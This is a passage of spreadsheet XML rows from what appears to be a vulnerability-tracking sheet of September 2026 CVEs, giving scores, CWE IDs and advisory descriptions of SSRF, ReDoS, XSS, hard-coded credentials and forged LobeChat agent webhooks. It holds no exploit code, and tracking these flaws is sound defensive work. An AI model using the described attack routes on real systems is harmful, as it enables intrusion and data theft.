        </is>
      </c>
      <c r="C3655" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3655" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3655" s="5" t="inlineStr"/>
      <c r="F3655" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3655" s="5" t="inlineStr"/>
      <c r="H3655" s="5" t="inlineStr"/>
      <c r="I3655" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3655" s="5" t="inlineStr"/>
      <c r="K3655" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L3655" s="5" t="inlineStr">
        <is>
          <t>Colord is a tiny yet powerful tool for high-performance color manipulations and conversions. Prior to 2.9.4, synchronous CSS color string matchers in src/colorModels/rgbString.ts, src/colorModels/hslString.ts, src/colorModels/hwbString.ts, src/colorModels/lchString.ts, and src/colorModels/cmykString.ts use the ambiguous numeric regular expression ([+-]?\d*.?\d+), allowing the same digits to be divided between overlapping quantifiers in quadratically many ways when malformed input is rejected. An attacker who can supply an unbounded color string to colord(), getFormat(), isEqual(), mix(), or contrast(), including through a request body, JSON field, or uploaded stylesheet, can block the processing thread with a multi-kilobyte payload. The affected matchers are parseRgbaString, parseHslaString, parseHwbaString, parseLchaString, and parseCmykaString. This issue is fixed in version 2.9.4.</t>
        </is>
      </c>
      <c r="M3655" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85062</t>
        </is>
      </c>
    </row>
    <row r="3656">
      <c r="A3656" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3656" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85063</t>
        </is>
      </c>
      <c r="C3656" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3656" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3656" s="5" t="inlineStr"/>
      <c r="F3656" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3656" s="5" t="inlineStr"/>
      <c r="H3656" s="5" t="inlineStr"/>
      <c r="I3656" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3656" s="5" t="inlineStr"/>
      <c r="K3656" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L3656" s="5" t="inlineStr">
        <is>
          <t>node-csv i</t>
        </is>
      </c>
      <c r="M3656" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85063</t>
        </is>
      </c>
    </row>
    <row r="3657">
      <c r="A3657" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3657" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85149</t>
        </is>
      </c>
      <c r="C3657" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3657" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3657" s="5" t="inlineStr"/>
      <c r="F3657" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3657" s="5" t="inlineStr"/>
      <c r="H3657" s="5" t="inlineStr"/>
      <c r="I3657" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3657" s="5" t="inlineStr"/>
      <c r="K3657" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L3657" s="5" t="inlineStr">
        <is>
          <t>SmartIT Desktop Manager developed by Lightstar has a Use of Hard-coded Credentials vulnerability. Unauthenticated remote attackers can obtain the SFTP service credentials of the SmartIT Agent application from the source code, thereby browsing the file system of the user's host.</t>
        </is>
      </c>
      <c r="M3657" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85149</t>
        </is>
      </c>
    </row>
    <row r="3658">
      <c r="A3658" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3658" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85156</t>
        </is>
      </c>
      <c r="C3658" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3658" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3658" s="5" t="inlineStr"/>
      <c r="F3658" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3658" s="5" t="inlineStr"/>
      <c r="H3658" s="5" t="inlineStr"/>
      <c r="I3658" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3658" s="5" t="inlineStr"/>
      <c r="K3658" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L3658" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo fails to properly validate access controls on the public channel page, allowing unauthenticated visitors to view unlisted and group-restricted videos through hardcoded visibility flags and an undefined property. Attackers can access the channel endpoint to retrieve sensitive video content that should be hidden, including full URLs to unlisted videos and thumbnails of member-only content, regardless of the operator's hidePrivateVideos setting.</t>
        </is>
      </c>
      <c r="M3658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85156</t>
        </is>
      </c>
    </row>
    <row r="3659">
      <c r="A3659" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85157</t>
        </is>
      </c>
      <c r="C3659" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3659" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3659" s="5" t="inlineStr"/>
      <c r="F3659" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3659" s="5" t="inlineStr"/>
      <c r="H3659" s="5" t="inlineStr"/>
      <c r="I3659" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3659" s="5" t="inlineStr"/>
      <c r="K3659" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L3659" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo contains a broken access control vulnerability in the unauthenticated feed/index.php endpoint that disables per-video visibility checks when a program_id parameter is supplied. Attackers can enumerate playlist identifiers and retrieve unlisted and group-restricted videos by requesting the RSS feed with any visible playlist id, including empty playlists that return the entire site's hidden video catalogue.</t>
        </is>
      </c>
      <c r="M3659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85157</t>
        </is>
      </c>
    </row>
    <row r="3660">
      <c r="A3660" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85242</t>
        </is>
      </c>
      <c r="C3660" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3660" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3660" s="5" t="inlineStr"/>
      <c r="F3660" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3660" s="5" t="inlineStr"/>
      <c r="H3660" s="5" t="inlineStr"/>
      <c r="I3660" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3660" s="5" t="inlineStr"/>
      <c r="K3660" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3660" s="5" t="inlineStr">
        <is>
          <t>PlaywrightCapture contains a server-side request forgery (SSRF) vulnerability in its favicon retrieval functionality. When only_global_lookup is enabled, the application validates the initial favicon URL to prevent requests to localhost, loopback, or other non-public network addresses. However, redirects followed by aiohttp were not subjected to the same validation.
An attacker able to influence the content of a page processed by PlaywrightCapture could specify a publicly reachable favicon URL that responds with an HTTP redirect to a local or otherwise restricted address, such as 127.0.0.1, localhost, or an internal network service. Because aiohttp automatically followed the redirect, the resulting request could bypass the application's local-address restrictions and cause the PlaywrightCapture host to issue HTTP requests to resources that should not be externally reachable.
Depending on the services reachable from the PlaywrightCapture host and how retrieved favicon data is subsequently exposed or processed, this could be used to probe internal HTTP services or potentially obtain information from otherwise inaccessible endpoints.
The patch introduces an aiohttp request middleware that applies the existing local-URL validation to every request in the redirect chain. Requests resolving to restricted/local destinations are rejected before they are issued.</t>
        </is>
      </c>
      <c r="M3660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85242</t>
        </is>
      </c>
    </row>
    <row r="3661">
      <c r="A3661" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85586</t>
        </is>
      </c>
      <c r="C3661" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3661" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3661" s="5" t="inlineStr"/>
      <c r="F3661" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3661" s="5" t="inlineStr"/>
      <c r="H3661" s="5" t="inlineStr"/>
      <c r="I3661" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3661" s="5" t="inlineStr"/>
      <c r="K3661" s="5" t="inlineStr">
        <is>
          <t>CWE-799</t>
        </is>
      </c>
      <c r="L3661" s="5" t="inlineStr">
        <is>
          <t>phpMyFAQ versions before 4.1.8 fail to validate CAPTCHA when the store parameter is set to 'now' in question submission requests. Unauthenticated attackers can bypass CAPTCHA protection and submit unlimited questions directly, causing database pollution and triggering outgoing mail notifications.</t>
        </is>
      </c>
      <c r="M3661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85586</t>
        </is>
      </c>
    </row>
    <row r="3662">
      <c r="A3662" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85609</t>
        </is>
      </c>
      <c r="C3662" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3662" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3662" s="5" t="inlineStr"/>
      <c r="F3662" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3662" s="5" t="inlineStr"/>
      <c r="H3662" s="5" t="inlineStr"/>
      <c r="I3662" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3662" s="5" t="inlineStr"/>
      <c r="K3662" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3662" s="5" t="inlineStr">
        <is>
          <t>Openpanel before 2.3.0 contains an unauthenticated full-read server-side request forgery (SSRF) vulnerability in the GET /tools/site-checker endpoint (apps/api/src/controllers/tools.controller.ts). The endpoint passes a user-supplied url query parameter to fetchWithRedirects() and performs server-side HTTP requests to arbitrary URLs without any SSRF/IP validation. An unauthenticated remote attacker can access cloud instance metadata endpoints, probe internal services, scan internal network ports, and read returned content (status code, page size, timing, and parsed HTML metadata), and leak internal IP addresses (via getIPInfo() to a third party).</t>
        </is>
      </c>
      <c r="M3662" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85609</t>
        </is>
      </c>
    </row>
    <row r="3663">
      <c r="A3663" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85621</t>
        </is>
      </c>
      <c r="C3663" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3663" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3663" s="5" t="inlineStr"/>
      <c r="F3663" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3663" s="5" t="inlineStr"/>
      <c r="H3663" s="5" t="inlineStr"/>
      <c r="I3663" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3663" s="5" t="inlineStr"/>
      <c r="K3663" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L3663" s="5" t="inlineStr">
        <is>
          <t>LobeChat (LobeHub) 2.2.1 does not properly verify inbound chat-platform webhook signatures in the QQ and Feishu adapters. The webhook route (/api/agent/webhooks/:platform) is unauthenticated by design and delegates verification to each adapter; the QQ adapter performs no Ed25519 signature verification on dispatched message events, and the Feishu adapter only performs an optional static-token comparison that is skipped when no token is configured (the default) and is not a body signature. An unauthenticated attacker who knows the public webhook URL can POST forged inbound messages with an attacker-chosen sender identity and arbitrary text, causing the bot owner's agent to process attacker-controlled input and treat the attacker as a trusted platform sender.</t>
        </is>
      </c>
      <c r="M3663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85621</t>
        </is>
      </c>
    </row>
    <row r="3664">
      <c r="A3664" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85662</t>
        </is>
      </c>
      <c r="C3664" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3664" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3664" s="5" t="inlineStr"/>
      <c r="F3664" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3664" s="5" t="inlineStr"/>
      <c r="H3664" s="5" t="inlineStr"/>
      <c r="I3664" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J3664" s="5" t="inlineStr"/>
      <c r="K3664" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3664" s="5" t="inlineStr">
        <is>
          <t>Marqo 2.26.0 contains a server-side request forgery vulnerability in the add_documents endpoint that allows unauthenticated attackers to trigger requests to arbitrary URLs by supplying malicious media field values. Attackers can exploit download_image_from_url and fetch_content_sample functions which lack destination filtering and host validation to access internal services and cloud metadata endpoints.</t>
        </is>
      </c>
      <c r="M3664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85662</t>
        </is>
      </c>
    </row>
    <row r="3665">
      <c r="A3665" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86138</t>
        </is>
      </c>
      <c r="C3665" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3665" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3665" s="5" t="inlineStr"/>
      <c r="F3665" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3665" s="5" t="inlineStr"/>
      <c r="H3665" s="5" t="inlineStr"/>
      <c r="I3665" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3665" s="5" t="inlineStr"/>
      <c r="K3665" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L3665" s="5" t="inlineStr">
        <is>
          <t>In libxml2 before 2.15.4, xmlDictAddQString in dict.c has an integer overflow and resultant heap-based buffer overflow.</t>
        </is>
      </c>
      <c r="M3665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86138</t>
        </is>
      </c>
    </row>
    <row r="3666">
      <c r="A3666" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86139</t>
        </is>
      </c>
      <c r="C3666" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3666" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3666" s="5" t="inlineStr"/>
      <c r="F3666" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3666" s="5" t="inlineStr"/>
      <c r="H3666" s="5" t="inlineStr"/>
      <c r="I3666" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3666" s="5" t="inlineStr"/>
      <c r="K3666" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="L3666" s="5" t="inlineStr">
        <is>
          <t>In libxml2 before 2.15.4, xmlURIEscapeStr in uri.c has an integer overflow.</t>
        </is>
      </c>
      <c r="M3666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86139</t>
        </is>
      </c>
    </row>
    <row r="3667">
      <c r="A3667" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86142</t>
        </is>
      </c>
      <c r="C3667" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3667" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3667" s="5" t="inlineStr"/>
      <c r="F3667" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3667" s="5" t="inlineStr"/>
      <c r="H3667" s="5" t="inlineStr"/>
      <c r="I3667" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3667" s="5" t="inlineStr"/>
      <c r="K3667" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L3667" s="5" t="inlineStr">
        <is>
          <t>In libxml2 before 2.15.4, there is a heap-based buffer overflow in xmlXPtrEvalXPtrPart because of xmlXPtrEval xpointer length saturation.</t>
        </is>
      </c>
      <c r="M3667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86142</t>
        </is>
      </c>
    </row>
    <row r="3668">
      <c r="A3668" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3668" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86143</t>
        </is>
      </c>
      <c r="C3668" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3668" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3668" s="5" t="inlineStr"/>
      <c r="F3668" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3668" s="5" t="inlineStr"/>
      <c r="H3668" s="5" t="inlineStr"/>
      <c r="I3668" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3668" s="5" t="inlineStr"/>
      <c r="K3668" s="5" t="inlineStr">
        <is>
          <t>CWE-192</t>
        </is>
      </c>
      <c r="L3668" s="5" t="inlineStr">
        <is>
          <t>In xmlIO in libxml2 before 2.15.4, an inconsistency in xmlOutputWriteCallback and xmlBufUse causes negative lengths to reach write callbacks, aka a lack of a check for integer overflow before calling writecallback. This has security relevance for many types of uses of that length value within a callback.</t>
        </is>
      </c>
      <c r="M3668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86143</t>
        </is>
      </c>
    </row>
    <row r="3669">
      <c r="A3669" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3669" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86188</t>
        </is>
      </c>
      <c r="C3669" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3669" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3669" s="5" t="inlineStr"/>
      <c r="F3669" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3669" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3669" s="5" t="inlineStr"/>
      <c r="I3669" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3669" s="5" t="inlineStr"/>
      <c r="K3669" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L3669" s="5" t="inlineStr">
        <is>
          <t>AVideo with YPTSocket plugin enabled contains a cross-site scripting vulnerability allowing unauthenticated attackers to execute arbitrary JavaScript in other users' browsers via the websocket callback mechanism. Attackers can send crafted socket messages with callback names resolving to global functions like avideoConfirmHTML that accept untrusted data and assign it to innerHTML, achieving script execution in the victim's origin without authentication or user interaction.</t>
        </is>
      </c>
      <c r="M3669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86188</t>
        </is>
      </c>
    </row>
    <row r="3670">
      <c r="A3670" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86194</t>
        </is>
      </c>
      <c r="C3670" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3670" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3670" s="5" t="inlineStr"/>
      <c r="F3670" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3670" s="5" t="inlineStr"/>
      <c r="H3670" s="5" t="inlineStr"/>
      <c r="I3670" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3670" s="5" t="inlineStr"/>
      <c r="K3670" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3670" s="5" t="inlineStr">
        <is>
          <t>Grav Form Plugin before 9.1.22 fails to verify page authorization when resolving forms by name across pages, allowing anonymous visitors to execute form actions defined on login-restricted or unpublished pages. Attackers can POST to any public page with a restricted form's name to trigger save, upload, email, or call actions without authentication.</t>
        </is>
      </c>
      <c r="M3670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86194</t>
        </is>
      </c>
    </row>
    <row r="3671">
      <c r="A3671" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86200</t>
        </is>
      </c>
      <c r="C3671" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3671" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3671" s="5" t="inlineStr"/>
      <c r="F3671" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3671" s="5" t="inlineStr"/>
      <c r="H3671" s="5" t="inlineStr"/>
      <c r="I3671" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3671" s="5" t="inlineStr"/>
      <c r="K3671" s="5" t="inlineStr">
        <is>
          <t>CWE-779</t>
        </is>
      </c>
      <c r="L3671" s="5" t="inlineStr">
        <is>
          <t>PocketMine-MP versions before 5.42.1 contain a denial of service vulnerability in the LoginPacket handler that allows remote attackers to flood warning messages by injecting numerous junk properties into the clientData JWT. Attackers can craft malicious login packets with excessive unknown properties to waste server CPU time and degrade performance.</t>
        </is>
      </c>
      <c r="M3671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86200</t>
        </is>
      </c>
    </row>
    <row r="3672">
      <c r="A3672" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86206</t>
        </is>
      </c>
      <c r="C3672" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3672" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3672" s="5" t="inlineStr"/>
      <c r="F3672" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3672" s="5" t="inlineStr"/>
      <c r="H3672" s="5" t="inlineStr"/>
      <c r="I3672" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J3672" s="5" t="inlineStr"/>
      <c r="K3672" s="5" t="inlineStr">
        <is>
          <t>CWE-791</t>
        </is>
      </c>
      <c r="L3672" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in the N-central internal API access control filter allows unauthorised access to internal APIs. This is fixed in N-central 2026.3 HF3 and 2026.4</t>
        </is>
      </c>
      <c r="M3672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86206</t>
        </is>
      </c>
    </row>
    <row r="3673">
      <c r="A3673" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3673" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86252</t>
        </is>
      </c>
      <c r="C3673" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3673" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3673" s="5" t="inlineStr"/>
      <c r="F3673" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3673" s="5" t="inlineStr"/>
      <c r="H3673" s="5" t="inlineStr"/>
      <c r="I3673" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="J3673" s="5" t="inlineStr"/>
      <c r="K3673" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="L3673" s="5" t="inlineStr">
        <is>
          <t>h3 versions before 1.15.9 fail to sanitize carriage return characters in EventStream data and comment fields, allowing attackers to inject arbitrary SSE events by including unsanitized carriage returns. Attackers can inject event type directives, split single push calls into multiple browser-parsed events, or escape comment fields to inject data, bypassing the prior CVE fix that only addressed newline injection.</t>
        </is>
      </c>
      <c r="M3673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86252</t>
        </is>
      </c>
    </row>
    <row r="3674">
      <c r="A3674" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86303</t>
        </is>
      </c>
      <c r="C3674" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3674" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3674" s="5" t="inlineStr"/>
      <c r="F3674" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3674" s="5" t="inlineStr"/>
      <c r="H3674" s="5" t="inlineStr"/>
      <c r="I3674" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3674" s="5" t="inlineStr"/>
      <c r="K3674" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-125</t>
        </is>
      </c>
      <c r="L3674" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was determined in 92181 markdown up to 058cab0cb7fb245a0ccc6b8446963ff8d573558f. Affected by this issue is the function lds of the file md.c. Executing a manipulation can lead to out-of-bounds read. The attack can be executed remotely. This product implements a rolling release for ongoing delivery, which means version information for affected or updated releases is unavailable. This patch is called c000d2f9cf390c315378d3717cf20911cf3e80a6. A patch should be applied to remediate this issue.</t>
        </is>
      </c>
      <c r="M3674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86303</t>
        </is>
      </c>
    </row>
    <row r="3675">
      <c r="A3675" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3675" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86317</t>
        </is>
      </c>
      <c r="C3675" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3675" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3675" s="5" t="inlineStr"/>
      <c r="F3675" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3675" s="5" t="inlineStr"/>
      <c r="H3675" s="5" t="inlineStr"/>
      <c r="I3675" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3675" s="5" t="inlineStr"/>
      <c r="K3675" s="5" t="inlineStr">
        <is>
          <t>CWE-617</t>
        </is>
      </c>
      <c r="L3675" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in ggml-org llama.cpp up to 0.4.0. This impacts the function rpc_server::deserialize_tensor of the file ggml/src/ggml-rpc/ggml-rpc.cpp of the component RPC Server. Performing a manipulation of the argument ne results in reachable assertion. The attack is possible to be carried out remotely. The reported GitHub issue was closed automatically due to inactivity.</t>
        </is>
      </c>
      <c r="M3675" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86317</t>
        </is>
      </c>
    </row>
    <row r="3676">
      <c r="A3676" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3676" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86431</t>
        </is>
      </c>
      <c r="C3676" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3676" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3676" s="5" t="inlineStr"/>
      <c r="F3676" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3676" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3676" s="5" t="inlineStr">
        <is>
